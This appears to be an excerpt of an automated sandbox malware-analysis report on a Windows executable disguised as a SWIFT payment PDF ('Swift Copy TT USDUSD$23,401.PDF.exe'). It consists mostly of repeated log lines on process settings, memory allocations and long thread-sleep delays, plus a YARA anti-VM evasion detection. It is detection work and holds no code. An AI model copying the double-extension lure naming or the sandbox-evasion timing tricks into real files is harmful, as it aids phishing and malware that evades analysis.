                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 4C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 8FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 9FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: A200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: B200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: BC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: CC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: DC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596231Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595358Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeWindow / User API: threadDelayed 2003Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeWindow / User API: threadDelayed 7855Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 6752Thread sleep count: 2003 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 6752Thread sleep count: 7855 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -597015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596231s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -596015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595358s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -595031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -594922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -594812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -594703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308Thread sleep time: -594593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596231Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596015Jump to behavior
